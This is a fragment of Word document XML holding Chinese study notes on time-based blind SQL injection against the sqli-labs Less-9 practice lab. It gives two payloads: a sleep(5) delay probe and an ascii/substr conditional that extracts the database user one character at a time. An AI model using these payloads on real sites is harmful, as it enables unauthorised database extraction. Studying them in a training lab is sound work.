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CA" w:rsidRDefault="00176A0B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于时间的盲注</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00176A0B" w:rsidRDefault="00176A0B">
      <w:r w:rsidRPr="00176A0B">
        <w:t>http://192.168.50.128/sqli-labs/Less-9/?id=1' and sleep(5) %23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C8466D" w:rsidRDefault="00C8466D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A2581AE" wp14:editId="28A01643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6D" w:rsidRDefault="00C8466D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果有注入点的话会等待4秒钟</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C8466D" w:rsidRDefault="00C8466D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>给出pay</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">load </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C8466D" w:rsidRDefault="00C8466D"/>
    <w:p w:rsidR="00C8466D" w:rsidRDefault="00C8466D">
      <w:r w:rsidRPr="00C8466D">
        <w:t>http://192.168.50.128/sqli-labs/Less-9/?id=1' and if((ascii(substr(user(),1,1))=1</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8466D">
        <w:t>4),0,sleep(5)) %23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C8466D" w:rsidRDefault="00C8466D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="565C07B9" wp14:editId="34EC58D7">
            <wp:extent cx="5274310" cy="2398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6D" w:rsidRDefault="00C8466D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误会给出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C8466D" w:rsidRDefault="00C8466D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正确的话</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C8466D" w:rsidRDefault="00C8466D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会迅速返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C8466D" w:rsidRPr="00C8466D" w:rsidRDefault="00C8466D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00C8466D" w:rsidRPr="00C8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8B"/>
    <w:rsid w:val="00176A0B"/>
    <w:rsid w:val="002F7631"/>
    <w:rsid w:val="00554ECA"/>
    <w:rsid w:val="00A8598B"/>
    <w:rsid w:val="00C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D83A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E1F98239-BFE2-4A9E-AE30-7B0ADB7D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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-05-18T02:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-05-18T02:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>